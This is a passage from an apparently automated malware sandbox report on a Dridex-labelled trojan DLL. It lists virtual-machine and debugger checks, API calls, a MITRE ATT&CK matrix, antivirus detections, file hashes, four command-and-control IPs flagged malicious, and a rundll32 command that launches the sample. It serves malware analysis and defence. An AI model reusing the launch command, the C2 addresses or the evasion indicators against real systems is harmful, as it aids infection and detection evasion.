Section loaded: OutputDebugStringW count: 1573

Source: C:\Windows\System32\loaddll32.exe

Window / User API: threadDelayed 1573

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6F330730 GetTokenInformation,GetSystemInfo,GetTokenInformation,

0_2_6F330730

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
Source: Amcache.hve.5.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: WerFault.exe, 00000005.00000002.392252234.0000000004500000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWnedsblobprdwus16
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: WerFault.exe, 00000005.00000002.392252234.0000000004500000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1x
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6F326D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6F326D0C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6F333138 RtlAddVectoredExceptionHandler,

0_2_6F333138

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.873849571.00000000013B0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.360156442.0000000003050000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.357695903.0000000003050000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.873849571.00000000013B0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.360156442.0000000003050000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.357695903.0000000003050000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.873849571.00000000013B0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.360156442.0000000003050000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.357695903.0000000003050000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: loaddll32.exe, 00000000.00000002.873849571.00000000013B0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.360156442.0000000003050000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.357695903.0000000003050000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6F326D0C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

0_2_6F326D0C

Source: Amcache.hve.5.dr

Binary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion11	Input Capture1	Security Software Discovery31	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	19%	Virustotal		Browse
SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	30%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.0.rundll32.exe.800000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.rundll32.exe.6f320000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.0.rundll32.exe.800000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.rundll32.exe.800000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.rundll32.exe.6f320000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.2.loaddll32.exe.b40000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.loaddll32.exe.6f320000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.2.rundll32.exe.6f320000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.n4pkg6fy8o.gaDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.5.dr	false		high
http://www.n4pkg6fy8o.gaDVarFileInfo$	loaddll32.exe, 00000000.00000002.874127686.000000006F33F000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.360458049.000000006F33F000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.4.135.27	unknown	Greece	199246	TOPHOSTGR	true
85.10.248.28	unknown	Germany	24940	HETZNER-ASDE	true
80.211.3.13	unknown	Italy	31034	ARUBA-ASNIT	true
144.91.122.102	unknown	Germany	51167	CONTABODE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	544206
Start date:	22.12.2021
Start time:	20:39:21
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.31369 (renamed file extension from 31369 to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@6/6@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 98.6%) Quality average: 79.9% Quality standard deviation: 24.3%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.189.173.21 Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
20:40:41	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.4.135.27	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
85.10.248.28	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
80.211.3.13	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TOPHOSTGR	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	Positive_Result_75184731.xls	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
ARUBA-ASNIT	triage_dropped_file.dll	Get hash	malicious	Browse	80.211.3.13
	triage_dropped_file.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	80.211.3.13
	yXVganwQXW.dll	Get hash	malicious	Browse	212.237.56.116
	KT9GKWEcbY.dll	Get hash	malicious	Browse	212.237.56.116
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	80.211.3.13
	triage_dropped_file.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	80.211.3.13
	BOcrV5kVX1.dll	Get hash	malicious	Browse	212.237.56.116
	Y42bdCh1Yp.dll	Get hash	malicious	Browse	212.237.56.116
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	80.211.3.13
	Positive_Result_75184731.xls	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	80.211.3.13
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	80.211.3.13
HETZNER-ASDE	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	85.10.248.28
	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	UGDLmAm2UI.exe	Get hash	malicious	Browse	176.9.111.171
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	Positive_Result_75184731.xls	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	tTy0oHh7FM.exe	Get hash	malicious	Browse	148.251.234.83
	ykTwsaBnqa.exe	Get hash	malicious	Browse	144.76.84.177
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_f776f25ce5d0fce9d2964f299b501d9b7639e3b0_82810a17_19e007ed\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9236551068704879
Encrypted:	false
SSDEEP:	192:69iB0oXs/HBUZMX4jed+U/u7slS274ItWc:kivXs/BUZMX4jeB/u7slX4ItWc
MD5:	A30B852DBC5A67FA9DE2ECE5197E0587
SHA1:	CC520FB2AC24A23E02856138665B5E28B4CD7A6E
SHA-256:	EEB0A8ECB4D1E13B8A0F031D401B1C873E36719AF77E165DAE4E6EA5C28E552F
SHA-512:	549C7AC66467B9CF2CB99AA2836585B7956030A8EC9DFD1E0CCD27A1B715371F39D8A15FB6D53B9D1A792F60C5BBC4FB22AD78217E611B712F932CDCFCF9362D
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.4.7.0.8.0.3.0.1.8.8.1.5.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.4.7.0.8.0.3.7.0.7.8.7.5.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.1.6.1.7.c.0.c.-.b.e.c.0.-.4.3.e.7.-.a.d.6.d.-.c.7.e.e.0.6.e.3.3.3.1.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.3.f.7.e.7.6.0.-.6.5.e.6.-.4.e.0.1.-.a.2.b.5.-.d.5.3.9.f.7.1.e.9.2.9.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.4.0.-.0.0.0.1.-.0.0.1.7.-.d.0.4.0.-.a.9.3.2.b.7.f.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCC7.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Dec 23 04:40:31 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	43756
Entropy (8bit):	2.138345464113005
Encrypted:	false
SSDEEP:	192:RZ+lbuCLO5SkbvukdXNViYdNklWP5gMdMI5/Hm1i:Sa5LbrXViYHklVMd15fm1
MD5:	BD8EB2F8BE470D4393A6797AC651DA74
SHA1:	38D6E702C685F3704048849F4B070DE89DC570BE
SHA-256:	612E945ED75BCCEA6ABBC7B0520BCE0D3E3A913D3D66A0EC9D1569F94B12647B
SHA-512:	89658E76BB28F4B67F2AB78E33B1B5C784405B82AB36ACD5844CE90A9DC1D9FA30D2A31B234ADC24CFD8487C75F392237FFD820C755080BA26D828B9C68D4412
Malicious:	false
Reputation:	low
Preview:	MDMP....... ..........a.........................................-..........T.......8...........T...........@................................................................................................U...........B...... .......GenuineIntelW...........T.......@......a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE498.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8326
Entropy (8bit):	3.693989718029313
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiJj67OggsTu6Y+u6TgmfTQSKCpry89bwCsf/Qm:RrlsNi9606YH6TgmfTQSZwBfd
MD5:	984C2568CBD2D44E1A7F2FFA25B03A21
SHA1:	5975611D5CD0A501B3566E60DF33BC8971116DC5
SHA-256:	741018FF125372483C791958E58B6E5F705B1F4FBAD02CBCD34D38694635DFF9
SHA-512:	74ED23B7CF08500714C6A72136D8022352257AC6FB74ED5D25FEC5453A6A5A759D93F9ADF0581226C3B183E0D21D044C16FC183FBD1F5D91B2C4DD1DE08533DB
Malicious:	false
Reputation:	low
